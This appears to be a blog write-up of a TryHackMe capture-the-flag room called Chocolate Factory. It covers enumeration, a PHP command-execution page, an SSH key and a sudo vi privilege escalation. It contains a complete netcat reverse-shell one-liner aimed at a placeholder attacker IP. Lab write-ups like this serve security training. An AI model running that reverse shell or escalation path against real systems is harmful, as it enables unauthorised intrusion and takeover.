TryHackMe write-up: Chocolate Factory


This is my write-up for TryHackMe’s Chocolate Factory Room


Using nmap, I found that this box had several ports open.

Checking the webpage, I found what looked like a login page.

Running nmap’s service enumeration option, I saw something interesting for port 113.

It turns out that a file named key_rev_key is being hosted in the web site. Downloading it using ghidra, I was able to read the code and find the key being asked.

Running dirb, I found a php page.

From my browser, I checked the php page. It looked like it is used to execute commands!


I sent the command “ls -lhtra” to see if this page would run simple commands.

I then tried sending the following command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attacker IP] [Attacker port] >/tmp/f

I then checked my netcat listener, and found a connection from the target.

Checking the contents of the directory, I found another php file containing a possible set of credentials.

Trying to run su or ssh as this user proved futile. It seems that I needed to escalate privileges another way.

Privilege Escalation

Checking out charlie’s home directory showed what looked like an ssh private key.

Downloading the private key, I was able connect to the target via ssh as charlie.

Checking for sudo privileges, I found that the user charlie can execute vi as root. GTFOBins has a lot of examples showing how to root using vi.

Running and then entering the key found in enumeration phase shows the root flag.




I like breaking stuff.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Delete Folder/Sub-folder and files recursively in Java

Adventures with Memory Barriers and Seastar on Linux

Reduce Cost and Increase Productivity with Value Added IT Services from buzinessware — {link} -


MVC Core Bootstrapping And Request Response Process

eJPT Useful Commands

The Unrecognized Platform

What is all the fuss about digital twin?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


I like breaking stuff.

More from Medium

Shocker | HackTheBox writeup

TryHackMe-Gotta Catch’em All!(Pokemon)- Walkthrough by Subhadip Nag(MrL0s3r)

TryHackMe: BountyHacker